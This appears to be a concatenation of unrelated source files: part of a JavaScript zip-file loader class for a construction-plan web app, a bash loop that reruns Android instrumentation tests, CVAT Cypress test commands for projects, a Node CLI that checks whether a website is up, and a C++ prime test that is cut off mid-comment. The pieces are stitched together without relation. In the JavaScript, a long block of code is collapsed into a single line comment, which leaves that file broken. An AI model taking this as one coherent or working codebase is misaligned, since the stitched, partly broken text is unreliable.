    // /////////////////////////////////////////////////////////////
    // fill in layers with metaDataFilesInfo (e.g. layerJsonFilename)
    // /////////////////////////////////////////////////////////////

    let layer0 = undefined;
    for (let index in this.layerJsonFilenames) {
        let topDownJsonFullPath = this.layerJsonFilenames[index];
        let retVal = this.getFilesInfoForSpecifiedFilename(topDownJsonFullPath);
        let origSiteId = retVal.origSiteId;
        let origPlanId = retVal.origPlanId;
        let imagesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].imagesInfo;
        let metaDataFilesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].metaDataFilesInfo;

        let pathElements = COL.util.getPathElements(topDownJsonFullPath);
        let layerJsonFilename = pathElements['filename'];

        // Get the plan from the path
        let planInfo = COL.model.getPlanInfoBySiteIdAndPlanId(origSiteId, origPlanId);
        if(COL.util.isObjectInvalid(planInfo)) {
            // The .zip file has topDownJsonFullPath (e.g. 1/2/modelWith4Images.structure.layer0.json)
            // that is not in the file sitesInfo.json (e.g. that includes only part of the json files, e.g.
            // 6/8/modelWith4Images.structure.layer0.json, 6/9/modelWith4Images.structure.layer0.json, 7/10/modelWith4Images.structure.layer0.json
            // but not 1/2/modelWith4Images.structure.layer0.json)
            // this is part of bug "only save content that refers ... in notesConstructionOverlay.WebServer.v2.txt"
            // that will be fixed in tbd
            let msgStr = "origSiteId/origPlanId: " + origSiteId + "/" + origPlanId;
            console.warn('planInfo is undefined for: ', msgStr);
            continue;
        }
        let layer = COL.model.getLayerByPlanInfo(planInfo);
        if(COL.util.isObjectInvalid(layer)) {
            // sanity check
            // At this point the layer should already be created (pre-exists before reading from the zip file or added in the block above)
            throw new Error('layer is invalid');
        }

        //////////////////////////////////////////////////////////////////////////////////
        // populate the layer with metaDataFilesInfo
        //////////////////////////////////////////////////////////////////////////////////

        // tbd - layer.setImagesInfo is called later on in the function again - maybe not needed here.
        layer.setImagesInfo(imagesInfo);
        layer.setMetaDataFilesInfo(metaDataFilesInfo);

        let topDownJsonFileInfo = metaDataFilesInfo.getByKey(layerJsonFilename);
        let topDownJsonBlobInfo = topDownJsonFileInfo.blobInfo;
        if(COL.util.isObjectInvalid(topDownJsonBlobInfo) || COL.util.isObjectInvalid(topDownJsonBlobInfo.blobUrl)) {
            metaDataFilesInfo.printKeysAndValues();
            let msgStr = 'Invalid blobInfo for layerJsonFilename: ' + layerJsonFilename;
            throw new Error(msgStr);
        }
        await FileZipUtils.loadFile_viaFetch(layerJsonFilename, topDownJsonBlobInfo, "json");

        //////////////////////////////////////////////////////////////////////////////////
        // populate the layer with imagesInfo
        //////////////////////////////////////////////////////////////////////////////////

        // Load files related to topDownJson file (e.g. floorPlan image file, overlay image files) into imageInfoVec
        await COL.loaders.CO_ObjectLoader.loadLayerJsonFile_fromZipFile(layerJsonFilename, layer);
        let imageInfoVec = layer.getImagesInfo();

        // loop over the entries of imageInfoVec. Construct blobInfo for every entry
        let iter = imageInfoVec.iterator();
        while (iter.hasNext()) {
            let keyVal = iter.nextKeyVal();
            let filename = keyVal[0];
            let imageInfo = keyVal[1];
            let imageFilenameFullPath = origSiteId + '/' + origPlanId + '/' + filename;
            // placeholder blobInfo - the actual blob is extracted lazily from the zip
            let blobInfo = new BlobInfo({filenameFullPath: imageFilenameFullPath, blobUrl: undefined, isDirty: false});
            imageInfo.blobInfo = blobInfo;
        }

        // Merge entries in imageInfoVec into imagesInfo
        imagesInfo.mergeArray(imageInfoVec);
        layer.setImagesInfo(imagesInfo);
        layer.setLayerJsonFilename(layerJsonFilename);
        layer0 = layer;
    }

    // /////////////////////////////////////////////////////////////
    // tbd - setSelectedLayer to the first layer ?
    // /////////////////////////////////////////////////////////////

    COL.model.setSelectedLayer(layer0);
    let selectedLayer = COL.model.getSelectedLayer();
    let imagesInfo = selectedLayer.getImagesInfo();
    // imagesInfo.printKeysAndValues();
    $(document).trigger("SceneLayerAdded", [layer0, COL.model.getLayers().size()]);

    console.log('layer0', layer0);
    console.log('layer0.planInfo', layer0.planInfo);
    // select the matching option in the sitePlan menu
    let matchPattern = layer0.planInfo.siteId + ":" + layer0.planInfo.id + ":" + layer0.planInfo.siteName + ":" + layer0.planInfo.name;
    let sceneBar = COL.model.getSceneBar();
    let optionIndex = sceneBar.findOptionIndexBySubstrInVal(matchPattern);
    if(optionIndex) {
        $('#sitesId')[0].selectedIndex = optionIndex;
    }

    return true;
};

// create blobInfo (if needed, extract blob as blob url), add to the imagesInfo or metaDataFilesInfo list, and return blobInfo
// filesInfo is a placeholder for imagesInfo, or metaDataFilesInfo:
// - When adding an image file (e.g. .jpg, .png), filesInfo === imagesInfo
// - When adding an metaData file (e.g. .json, .txt), filesInfo === metaDataFilesInfo
addBlobToFilesInfo = async function (filenameFullPath, filesInfo) {
    try {
        // loop over keys
        let pathElements = COL.util.getPathElements(filenameFullPath);
        let dirname = pathElements['dirname'];
        let filename = pathElements['filename'];
        var fileExtention = COL.util.getFileExtention(filename);

        let zipFileInfo = COL.model.getZipFileInfo();
        let fileInfo = zipFileInfo.files[filenameFullPath];
        if (fileInfo.url) {
            // manageMemory() is NOT taking care of Model::_zipFileInfo.files (but just of Layer::_imagesInfo)
            // as quick workaround revoke every url, so every url is loaded from the zip file from scratch
            URL.revokeObjectURL(fileInfo.url);
            fileInfo.url = null;
        }

        let blobInfo;
        let fileType2 = COL.util.getFileTypeFromFilename(filename);
        switch(fileType2) {
            case "jpg":
            case "png": {
                if (fileInfo.url) {
                    // the url already exists
                    // NOTE(review): fileInfo.url is always null here because it is revoked
                    // just above - this branch appears unreachable; confirm.
                    blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true});
                    let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo});
                    filesInfo.set(filename, imageInfo);
                }
                else {
                    // the url does not exist
                    let fileType = 'image/png';
                    if(fileExtention === "png") {
                        fileType = 'image/png';
                    }
                    else {
                        fileType = 'image/jpeg';
                    }
                    await FileZip_withJson.extractAsBlobUrl( fileInfo, fileType );
                    blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: false});

                    let pathElements = COL.util.getPathElements(fileInfo.filename);
                    let extension = pathElements['extension'];
                    // initialize imageTags to default values
                    let imageTags = { filename: fileInfo.filename, imageOrientation: -1 };
                    if(extension === 'jpg') {
                        let blob = await fetch(blobInfo.blobUrl).then(r => r.blob());
                        imageTags = await COL.core.ImageFile.getImageTags(fileInfo.filename, blob);
                    }
                    let imageInfo = new ImageInfo({filename: filenameFullPath, imageTags: imageTags, blobInfo: blobInfo});
                    filesInfo.set(filename, imageInfo);
                }
                break;
            }
            case "json": {
                await FileZip_withJson.extractAsBlobUrl(
fileInfo, 'text/plain' );
                blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true});
                let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo});
                filesInfo.set(filename, imageInfo);
                break;
            }
            default: {
                var msgStr = 'filename: ' + filename + ', fileExtension: ' + fileExtention + ' in .zip file is not supported';
                throw new Error(msgStr);
            }
        }

        return blobInfo;
    }
    catch (err) {
        console.error('err', err);
        throw new Error(400);
    }
};

// Extract a single image from the zip file into memory (reading only its slice
// of the zip), register it via addBlobToFilesInfo, and return the blob url.
getImageBlobUrlFromZipFile = async function (imageFilenameFullPath, imagesInfo) {
    // console.log('BEG getImageBlobUrlFromZipFile');

    let zipFileInfo = COL.model.getZipFileInfo();
    if(!zipFileInfo.files[imageFilenameFullPath]) {
        // console.log('zipFileInfo.files', zipFileInfo.files);
        let msgStr = 'zipFileInfo.files[imageFilenameFullPath] is undefined. imageFilename: ' + imageFilenameFullPath;
        throw msgStr;
    }

    // The file is not yet in memory, but its offset is stored in memory.
    // Load the file from the zip file into memory and render
    // unzip the image files (that were skipped in the initial load)
    // tbd - set doReadArrayBufferInChunks, if the zip file size passes a threshold (500 MB?)
let sliceBeg = zipFileInfo.files[imageFilenameFullPath].offsetInZipFile;
    // the slice covers the entry's local header plus its compressed payload
    let sliceEnd = sliceBeg + zipFileInfo.files[imageFilenameFullPath].headerSize + zipFileInfo.files[imageFilenameFullPath].compressedSize;
    let doSkipFileData = false;
    let zipLoaderForSlice = await FileZip_withJson.loadFromZipFile(sliceBeg, sliceEnd, doSkipFileData);
    let fileInfo = zipLoaderForSlice.files[imageFilenameFullPath];
    zipFileInfo.files[imageFilenameFullPath].buffer = fileInfo.buffer;
    let blobInfo = await COL.model.fileZip.addBlobToFilesInfo(imageFilenameFullPath, imagesInfo);
    return blobInfo.blobUrl;
};

// --------------------------------------------------------------

// Returns true only for the "zip" extension (case-insensitive).
isExtensionValid = function (extension) {
    switch (extension.toLowerCase()) {
        case "zip":
            return true;
    }
    return false;
}

// Loads slice from the zip file
static getZipFileSlice = async function(sliceBeg, sliceEnd) {
    // console.log('BEG getZipFileSlice');

    let zipFileInfo = COL.model.getZipFileInfo();
    let zipFile = zipFileInfo.zipFile;
    let zipFileName = zipFileInfo.zipFileName;

    let blobSlice = null;
    if( COL.util.isObjectInvalid(window.$agent) ) {
        // in native webapp - slice the File object directly
        blobSlice = zipFile.slice(sliceBeg, sliceEnd);
    }
    else {
        // in mobile app (e.g. jasonette-android) - fetch the slice from the backend
        const queryParams = new URLSearchParams({ sliceBeg: sliceBeg, sliceEnd: sliceEnd });
        // create the query params string with sliceBeg, sliceEnd
        let queryParamsStr = queryParams.toString();
        // e.g. "sliceBeg=0&sliceEnd=5000"
        console.log('queryParamsStr: ', queryParamsStr);
        // create the url string
        let url = COL.model.getUrlBase() + 'zipfile?'
+ queryParamsStr;
        let response = await fetch(url);
        // console.log('response.status', response.status);
        await COL.errorHandlingUtil.handleErrors(response);
        blobSlice = await response.blob();
    }
    return blobSlice;
};

// Loads blob slice (optionally the entire blob) from the zip file, and reads it into the layer
static loadFromZipFile = async function (sliceBeg, sliceEnd, doSkipFileData) {
    // console.log('BEG loadFromZipFile');

    let blobSlice = await FileZip_withJson.getZipFileSlice(sliceBeg, sliceEnd);

    // https://developer.mozilla.org/en-US/docs/Web/API/Blob/arrayBuffer
    // read the array buffer (blob.arrayBuffer() is newer than readAsArrayBuffer())
    let blobSliceArrayBuffer = await blobSlice.arrayBuffer();
    // console.log('blobSliceArrayBuffer.byteLength', blobSliceArrayBuffer.byteLength);
    // let dataView = new DataView(blobSliceArrayBuffer);

    ApiService.LOAD_FROM_TYPE = ApiService.API_SERVICE_TYPES.ApiServiceZip;
    // console.log('blobSlice.size', blobSlice.size);
    let zipLoader = await ZipLoader.unzip( blobSliceArrayBuffer, doSkipFileData );
    return zipLoader;
};

// this function is called for the native webapp. (in case of mobile webapp
// loading the zip file headers is done by trigerring a call to jasonette).
loadZipfileHeaders = async function (zipFile) {
    // console.log('BEG loadZipfileHeaders');

    // store the zip file object. It is used for reading specific files
    // individually from the zip file, later on
    let zipFileInfo = {
        zipFile: zipFile,
        zipFileName: zipFile.name,
        files: {}
    };
    COL.model.setZipFileInfo(zipFileInfo);

    // console.log('Unzip the file', zipFile.name);

    // Read the entire file to get the offsets; doSkipFileData=true means only
    // headers (not the payloads) are kept in memory.
    let doSkipFileData = true;
    // console.log('zipFile.size', zipFile.size);

    // MAX_BLOB_SLICE_SIZE_IN_BYTES needs to be bigger than the maximum individual file in the .zip file
    // 100 MB
    const MAX_BLOB_SLICE_SIZE_IN_BYTES = Number("1E8");
    let sliceBeg = 0;
    let numTotalBytesRead = 0;
    while(numTotalBytesRead < zipFile.size) {
        let sliceEnd = (sliceBeg + MAX_BLOB_SLICE_SIZE_IN_BYTES < zipFile.size) ? sliceBeg + MAX_BLOB_SLICE_SIZE_IN_BYTES : zipFile.size;
        let zipLoader = await FileZip_withJson.loadFromZipFile(sliceBeg, sliceEnd, doSkipFileData);
        if(zipLoader.numBytesRead == 0) {
            // nothing was read in the last slice, i.e. we reached the last zip entry
            break;
        }
        // loop over the zipLoader.files
        // calc the absolute file offset from the relative offset to the blobSlice
        for (const filenameFullPath of Object.keys(zipLoader.files)) {
            zipLoader.files[filenameFullPath].offsetInZipFile += sliceBeg;
            zipFileInfo.files[filenameFullPath] = zipLoader.files[filenameFullPath];
        }
        sliceBeg += zipLoader.numBytesRead;
        numTotalBytesRead += zipLoader.numBytesRead;
    }
};

// Loads the zip file, and reads it into the layer.
// The zip file is loaded in slices.
// The variable zipFile is only used in native webapp.
// In mobile app, the zipfile info is taken from model._zipFileInfo.files openSingleZipFile = async function (zipFile) { console.log('BEG openSingleZipFile'); let spinnerJqueryObj = $('#cssLoaderId'); spinnerJqueryObj.addClass("is-active"); let toastTitleStr = "Load from zip file"; try{ if( COL.util.isObjectInvalid(window.$agent) ) { // in native app if (!(zipFile instanceof File)) { console.error("Error from openSingleZipFile(): the parameter 'zipFile' must be a File instance."); throw new Error('Error from openSingleZipFile'); } // Add zipFile to opened list this.openedZipFileList.set(zipFile.name, zipFile); // Validate file extension let extension = COL.util.getFileTypeFromFilename(zipFile.name); if (!this.isExtensionValid(extension)) { console.error("The file must have '.zip' suffix. \nTry again."); spinnerJqueryObj.removeClass("is-active"); throw new Error("Not a zip file: " + zipFile.name); } // load the zip file headers console.time("time loadZipfileHeaders"); await this.loadZipfileHeaders(zipFile); console.timeEnd("time loadZipfileHeaders"); } else { // in mobile app - the headers are already loaded // (in model._zipFileInfo.files ) } FileZipUtils.filenamesFailedToLoad = []; console.time("time loadFilesFromZipFileInfoIntoBlobs"); await this.loadFilesFromZipFileInfoIntoBlobs(); console.timeEnd("time loadFilesFromZipFileInfoIntoBlobs"); await this.validateVersionAndExtractSitesInfo(); this.createLayers(); await this.populateLayers(); await COL.colJS.onSitesChanged(); let msgStr = "Succeeded to load"; if(COL.doEnableToastr) { toastr.success(msgStr, toastTitleStr, COL.errorHandlingUtil.toastrSettings); } else { console.log(msgStr); // alert(msgStr); } } catch(err) { console.error('err', err); let filenamesFailedToLoadAsStr = FileZipUtils.filenamesFailedToLoad.join(); let msgStr = "Failed to load. "; if(filenamesFailedToLoadAsStr !== '') { // let msgStr = "Failed to load from zip file. 
Failed files: " + filenamesFailedToLoadAsStr; // COL.errorHandlingUtil.bootstrap_alert_danger(msgStr); msgStr += "Failed files: " + filenamesFailedToLoadAsStr; } else { msgStr += err; } if(COL.doEnableToastr) { toastr.error(msgStr, toastTitleStr, COL.errorHandlingUtil.toastrSettings); } else { console.error(msgStr); // alert(msgStr); } } spinnerJqueryObj.removeClass("is-active"); }; static addNewPlan = async function (planInfo) { console.log('BEG addNewPlan'); let getSiteByNameResultAsJson = await COL.model.getSiteByName(planInfo.siteName); let siteId = null; if(getSiteByNameResultAsJson.name) { let siteName = getSiteByNameResultAsJson.name; let msgStr = 'siteName: ' + siteName + ' already exists for the user'; console.log(msgStr); siteId = getSiteByNameResultAsJson.id; } else { let msgStr = 'siteName: ' + planInfo.siteName + ' do NOT exist for the user'; console.log(msgStr); let addNewSiteResultAsJson = await FileZipUtils.addNewSite(planInfo); siteId = addNewSiteResultAsJson.id; } // tbd - add the plan and update planInfo let addNewSitePlanResultAsJson = await FileZip_withJson.addNewSitePlan(siteId, planInfo); console.log('addNewSitePlanResultAsJson', addNewSitePlanResultAsJson); return addNewSitePlanResultAsJson; }; // extractAsBlobUrl fills-in fileInfo.buffer, (fileInfo points to an entry in zipFileInfo.files[xxx]) static extractAsBlobUrl = async function (fileInfo, type) { // console.log('BEG extractAsBlobUrl'); if (fileInfo.url) { return fileInfo.url; } if(COL.util.isObjectInvalid(fileInfo.buffer)) { // get the buffer await FileZip_withJson.readZipEntryData(fileInfo.filename); if(COL.util.isObjectInvalid(fileInfo.buffer)) { throw new Error("Failed to read the buffer for file: " + fileInfo.filename); } } var blob = new Blob([fileInfo.buffer], { type: type }); fileInfo.url = URL.createObjectURL(blob); return; }; // Load the image file data from the zip file as blob into memory static readZipEntryData = async function (filename) { // console.log('BEG 
readZipEntryData'); let zipFileInfo = COL.model.getZipFileInfo(); let zipFileInfoFile = zipFileInfo.files[filename]; let sliceBeg = zipFileInfo.files[filename].offsetInZipFile; let sliceEnd = sliceBeg + zipFileInfo.files[filename].headerSize + zipFileInfo.files[filename].compressedSize; let doSkipFileData = false; let zipLoaderForSlice = await FileZip_withJson.loadFromZipFile(sliceBeg, sliceEnd, doSkipFileData); zipFileInfo.files[filename].buffer = zipLoaderForSlice.files[filename].buffer; }; static addNewSitePlan = function (siteId, planInfo) { console.log('BEG addNewSitePlan'); return new Promise(async function(resolve, reject) { // //////////////////////////////////////////////// // POST - Add new metadata // //////////////////////////////////////////////// console.log('planInfo', planInfo); let plan_url = planInfo.planFilename; let jsonData = {plan_name: planInfo.name, plan_url: plan_url, is_selected: false, site_id: siteId}; let jsonDataAsStr = JSON.stringify(jsonData); console.log('jsonDataAsStr', jsonDataAsStr); let postNewSitePlanUrl = COL.model.getUrlBase() + 'api/v1_2/create_plan'; let headersData = { 'Content-Type': 'application/json', 'X-CSRF-Token': COL.model.csrf_token }; let fetchData = { method: 'POST', body: jsonDataAsStr, headers: headersData }; let dataAsJson = await fetch(postNewSitePlanUrl, fetchData).then(response => response.json()); resolve(dataAsJson); }); }; }; export { FileZip_withJson };
#!/usr/bin/env bash
# Repeatedly run the app's Android instrumentation test suite, pausing 3
# seconds between runs (useful for soak-testing / reproducing flaky tests).
# Requires adb on PATH with a connected device or emulator; stop with Ctrl-C.
while true; do
    adb shell am instrument -w com.android.test.qutoutiao.test/android.support.test.runner.AndroidJUnitRunner
    sleep 3
done
<reponame>ACHultman/cvat
// Copyright (C) 2020-2022 Intel Corporation
//
// SPDX-License-Identifier: MIT

/// <reference types="cypress" />

// Custom Cypress commands for the CVAT projects UI: navigation, CRUD,
// import/export/backup, and task moving. Registered globally via
// Cypress.Commands.add so specs can call them as cy.<name>(...).

// Navigate to the projects list via the header toggle and wait for the
// page spinner to disappear.
Cypress.Commands.add('goToProjectsList', () => {
    cy.get('[value="projects"]').click();
    cy.url().should('include', '/projects');
    cy.get('.cvat-spinner').should('not.exist');
});

// Create a project with one label carrying one text attribute.
// expectedResult: 'success' asserts the success notification appears,
// 'fail' asserts it does not. Always returns to the projects list.
Cypress.Commands.add(
    'createProjects',
    (projectName, labelName, attrName, textDefaultValue, multiAttrParams, expectedResult = 'success') => {
        cy.get('#cvat-create-project-button').click();
        cy.get('#name').type(projectName);
        cy.get('.cvat-constructor-viewer-new-item').click();
        cy.get('[placeholder="Label name"]').type(labelName);
        cy.get('.cvat-new-attribute-button').click();
        cy.get('[placeholder="Name"]').type(attrName);
        cy.get('.cvat-attribute-type-input').click();
        cy.get('.cvat-attribute-type-input-text').click();
        cy.get('[placeholder="Default value"]').type(textDefaultValue);
        if (multiAttrParams) {
            // Optional extra attribute defined by another custom command.
            cy.updateAttributes(multiAttrParams);
        }
        cy.contains('button', 'Done').click();
        cy.get('.cvat-create-project-content').within(() => {
            cy.contains('Submit').click();
        });
        if (expectedResult === 'success') {
            cy.get('.cvat-notification-create-project-success').should('exist').find('[data-icon="close"]').click();
        } else if (expectedResult === 'fail') {
            cy.get('.cvat-notification-create-project-success').should('not.exist');
        }
        cy.goToProjectsList();
    },
);

// Delete every project whose name is in projectsToDelete directly through
// the REST API (bypasses the UI). authResponse is a login response whose
// body carries the token.
Cypress.Commands.add('deleteProjects', (authResponse, projectsToDelete) => {
    const authKey = authResponse.body.key;
    cy.request({
        url: '/api/projects?page_size=all',
        headers: {
            Authorization: `Token ${authKey}`,
        },
    }).then((_response) => {
        const responceResult = _response.body.results;
        for (const project of responceResult) {
            const { id, name } = project;
            for (const projectToDelete of projectsToDelete) {
                if (name === projectToDelete) {
                    cy.request({
                        method: 'DELETE',
                        url: `/api/projects/${id}`,
                        headers: {
                            Authorization: `Token ${authKey}`,
                        },
                    });
                }
            }
        }
    });
});

// Open a project's details page by clicking its name in the list.
Cypress.Commands.add('openProject', (projectName) => {
    cy.contains(projectName).click({ force: true });
    cy.get('.cvat-project-details').should('exist');
});

// Hover the actions button on a project card to open its actions menu.
Cypress.Commands.add('projectActions', (projectName) => {
    cy.contains('.cvat-projects-project-item-title', projectName)
        .parents('.cvat-projects-project-item-card')
        .within(() => {
            // NOTE(review): 'porjects' is presumably the actual (misspelled)
            // class name in the application markup — confirm before "fixing".
            cy.get('.cvat-porjects-project-item-description').within(() => {
                cy.get('[type="button"]').trigger('mouseover');
            });
        });
});

// Delete a project via the UI actions menu and assert the card fades
// out ('success') or does not ('fail').
Cypress.Commands.add('deleteProject', (projectName, projectID, expectedResult = 'success') => {
    cy.projectActions(projectName);
    cy.get('.cvat-project-actions-menu').contains('Delete').click();
    cy.get('.cvat-modal-confirm-remove-project')
        .should('contain', `The project ${projectID} will be deleted`)
        .within(() => {
            cy.contains('button', 'Delete').click();
        });
    if (expectedResult === 'success') {
        cy.get('.cvat-projects-project-item-card').should('have.css', 'opacity', '0.5');
    } else if (expectedResult === 'fail') {
        cy.get('.cvat-projects-project-item-card').should('not.have.css', 'opacity', '0.5');
    }
});

// Start a dataset/annotations export for a project. type === 'dataset'
// ticks the "save images" checkbox; archiveCustomeName (sic — keeps the
// existing call-site spelling) sets a custom archive file name.
Cypress.Commands.add('exportProject', ({
    projectName, type, dumpType, archiveCustomeName,
}) => {
    cy.projectActions(projectName);
    cy.get('.cvat-project-actions-menu').contains('Export dataset').click();
    cy.get('.cvat-modal-export-project').should('be.visible').find('.cvat-modal-export-select').click();
    cy.contains('.cvat-modal-export-option-item', dumpType).should('be.visible').click();
    cy.get('.cvat-modal-export-select').should('contain.text', dumpType);
    if (type === 'dataset') {
        cy.get('.cvat-modal-export-project').find('[type="checkbox"]').should('not.be.checked').check();
    }
    if (archiveCustomeName) {
        cy.get('.cvat-modal-export-project').find('.cvat-modal-export-filename-input').type(archiveCustomeName);
    }
    cy.get('.cvat-modal-export-project').contains('button', 'OK').click();
    cy.get('.cvat-notification-notice-export-project-start').should('be.visible');
});

// Import a dataset archive into a project and wait until the import
// status modal disappears (import finished).
Cypress.Commands.add('importProject', ({
    projectName, format, archive,
}) => {
    cy.projectActions(projectName);
    cy.get('.cvat-project-actions-menu').contains('Import dataset').click();
    cy.get('.cvat-modal-import-dataset').find('.cvat-modal-import-select').click();
    if (format === 'Sly Point Cloud Format') {
        // This option sits below the fold of the dropdown; scroll to it.
        cy.get('.ant-select-dropdown')
            .not('.ant-select-dropdown-hidden')
            .trigger('wheel', { deltaY: 1000 });
    }
    cy.contains('.cvat-modal-import-dataset-option-item', format).click();
    cy.get('.cvat-modal-import-select').should('contain.text', format);
    cy.get('input[type="file"]').last().attachFile(archive, { subjectType: 'drag-n-drop' });
    cy.get(`[title="${archive}"]`).should('be.visible');
    cy.contains('button', 'OK').click();
    cy.get('.cvat-modal-import-dataset-status').should('be.visible');
    cy.get('.cvat-notification-notice-import-dataset-start').should('be.visible');
    cy.get('.cvat-modal-import-dataset-status').should('not.exist');
});

// Trigger a full project backup from the actions menu.
Cypress.Commands.add('backupProject', (projectName) => {
    cy.projectActions(projectName);
    cy.get('.cvat-project-actions-menu').contains('Backup Project').click();
});

// Restore a project from a backup archive; expects the API to answer
// 202 (accepted) and then 201 (created) on the same intercepted route.
Cypress.Commands.add('restoreProject', (archiveWithBackup) => {
    cy.intercept('POST', '/api/projects/backup?**').as('restoreProject');
    cy.get('.cvat-import-project').click().find('input[type=file]').attachFile(archiveWithBackup);
    cy.wait('@restoreProject', { timeout: 5000 }).its('response.statusCode').should('equal', 202);
    cy.wait('@restoreProject').its('response.statusCode').should('equal', 201);
    // NOTE(review): 'succesfully' matches the application's notification
    // text — keep in sync with the app string, not dictionary spelling.
    cy.contains('Project has been created succesfully')
        .should('exist')
        .and('be.visible');
    cy.get('[data-icon="close"]').click(); // Close the notification
});

// Yield the file name of the next download, parsed from the
// Content-Disposition header of the intercepted download request.
Cypress.Commands.add('getDownloadFileName', () => {
    cy.intercept('GET', '**=download').as('download');
    cy.wait('@download').then((download) => {
        const filename = download.response.headers['content-disposition'].split(';')[1].split('filename=')[1];
        // need to remove quotes
        return filename.substring(1, filename.length - 1);
    });
});

// Wait for the next download to land on disk and verify it exists.
Cypress.Commands.add('waitForDownload', () => {
    cy.getDownloadFileName().then((filename) => {
        cy.verifyDownload(filename);
    });
});

// Delete the currently open project from its top-bar actions menu and
// assert it disappears from the projects list.
Cypress.Commands.add('deleteProjectViaActions', (projectName) => {
    cy.get('.cvat-project-top-bar-actions').trigger('mouseover');
    cy.get('.cvat-project-actions-menu').within(() => {
        cy.contains('[role="menuitem"]', 'Delete').click();
    });
    cy.get('.cvat-modal-confirm-remove-project').within(() => {
        cy.contains('button', 'Delete').click();
    });
    cy.contains('.cvat-projects-project-item-title', projectName).should('not.exist');
});

// Assign the open project to a user via the assignee autocomplete.
Cypress.Commands.add('assignProjectToUser', (user) => {
    cy.get('.cvat-project-details').within(() => {
        cy.get('.cvat-user-search-field').click().type(user);
        cy.wait(300); // let the autocomplete dropdown populate
    });
    cy.get('.ant-select-dropdown')
        .not('.ant-select-dropdown-hidden')
        .within(() => {
            cy.get(`.ant-select-item-option[title="${user}"]`).click();
        });
});

// Close a notification identified by its CSS class and assert it's gone.
Cypress.Commands.add('closeNotification', (className) => {
    cy.get(className).find('span[aria-label="close"]').click();
    cy.get(className).should('not.exist');
});

// Move a task into a project. fromTask opens the menu from the task's
// own page; otherwise from the tasks list. When the label names differ,
// a label mapping is selected in the move dialog.
Cypress.Commands.add('movingTask', (taskName, projectName, labelMappingFrom, labelMappingTo, fromTask) => {
    if (fromTask) {
        cy.contains('.cvat-text-color', 'Actions').click();
    } else {
        cy.contains('strong', taskName).parents('.cvat-tasks-list-item').find('.cvat-menu-icon').click();
    }
    cy.get('.cvat-actions-menu')
        .should('be.visible')
        .find('[role="menuitem"]')
        .filter(':contains("Move to project")')
        .last()
        .click();
    cy.get('.cvat-task-move-modal').find('.cvat-project-search-field').click();
    cy.get('.ant-select-dropdown')
        .last()
        .should('be.visible')
        .within(() => {
            cy.get(`[title="${projectName}"]`).click();
        });
    if (labelMappingFrom !== labelMappingTo) {
        cy.get('.cvat-move-task-label-mapper-item').within(() => {
            cy.contains(labelMappingFrom).should('exist');
            cy.get('.cvat-move-task-label-mapper-item-select').should('be.visible').click();
        });
        cy.get('.ant-select-dropdown')
            .last()
            .should('be.visible')
            .find(`[title="${labelMappingTo}"]`).click();
    } else {
        // Same label name on both sides: the mapper should already show it.
        cy.get('.cvat-move-task-label-mapper-item').within(() => {
            cy.get('.cvat-move-task-label-mapper-item-select').should('have.text', labelMappingFrom);
        });
    }
    cy.get('.cvat-task-move-modal').within(() => {
        cy.contains('button', 'OK').click();
    });
});
#!/usr/bin/env node
// Small CLI that checks whether a website is up via the isitup.org API
// and optionally opens it in the default browser.
//
// Usage: <cli> <domain> [-w|--website] [-y|--yes]

const fetch = require('node-fetch')
const open = require('open')
const arg = require('arg')
const inquirer = require('inquirer')

// Parse raw process arguments into an options object.
//   --website / -w : open the site without prompting
//   --yes / -y     : assume "yes" for every prompt
function ParseCliArgsIntoOptions() {
    const args = arg(
        {
            '--website': Boolean,
            '--yes': Boolean,
            '-w': '--website',
            '-y': '--yes'
        },
        { argv: process.argv.slice(2) }
    )
    return {
        website: args['--website'] || false,
        // FIX: --yes was parsed but previously dropped; it is now wired
        // up so -y actually skips the confirmation prompt.
        yes: args['--yes'] || false
    }
}

// Ask whether to open the website, unless --website or --yes already
// answered the question on the command line.
async function PromptForOptions(options) {
    if (options.website || options.yes) {
        return { ...options, website: true };
    }
    const answers = await inquirer.prompt([
        {
            type: 'confirm',
            name: 'website',
            message: 'Open the website on your browser?',
            default: false,
        },
    ]);
    return { ...options, website: answers.website };
}

// Open the checked domain in the default browser if the user opted in.
// `result` is the parsed isitup.org response (uses result.domain).
async function LaunchWebsite(result) {
    let options = ParseCliArgsIntoOptions();
    options = await PromptForOptions(options);
    if (options.website) { // strict truthy check instead of `== true`
        open(`https://${result.domain}`);
    }
}

const site = process.argv[2]

// Query isitup.org for `name` and report its status with colored output.
function CheckSite(name) {
    // FIX: guard against a missing argument — `name.indexOf` on undefined
    // used to crash with a TypeError.
    if (!name || name.indexOf('.') === -1) {
        console.log('\x1b[31m%s\x1b[0m', 'please append a url extension (whatever.com)')
        return
    }
    fetch(`https://isitup.org/${name}.json`)
        .then(response => response.json())
        .then(function (result) {
            console.log(result.response_code)
            switch (result.response_code) {
                case 200:
                    console.log('\x1b[32m%s\x1b[0m', 'website appears to be up and running')
                    LaunchWebsite(result)
                    break
                case 301:
                    console.log('\x1b[34m%s\x1b[0m', 'website has been moved permanently but appears to be up and running')
                    LaunchWebsite(result)
                    break
                case 302:
                    console.log('\x1b[34m%s\x1b[0m', 'website has a temporary redirect but appears to be up and running')
                    LaunchWebsite(result)
                    break
                case 403:
                    console.log('\x1b[33m%s\x1b[0m', 'website information not found')
                    LaunchWebsite(result)
                    break
                default:
                    console.log('\x1b[31m%s\x1b[0m', 'website appears to be down')
                    break
            }
        })
        .catch(err => {
            // FIX: network failures / non-JSON responses were previously
            // unhandled promise rejections.
            console.error('\x1b[31m%s\x1b[0m', `failed to reach isitup.org: ${err.message}`)
        })
}

CheckSite(site)
#include <iostream>
using namespace std;

// Return true when n is prime.
// Uses the 6k +/- 1 optimization: after ruling out multiples of 2 and 3,
// every prime > 3 has the form 6k-1 or 6k+1, so only those candidates up
// to sqrt(n) need testing.
bool isPrime(int n)
{
    // 0, 1 and negatives are not prime
    if (n <= 1)
        return false;
    // 2 and 3 are prime
    if (n <= 3)
        return true;

    // Eliminate multiples of 2 and 3 so the loop below can step by 6
    if (n % 2 == 0 || n % 3 == 0)
        return false;

    // i and i+2 cover the 6k-1 / 6k+1 candidates; i*i <= n bounds the
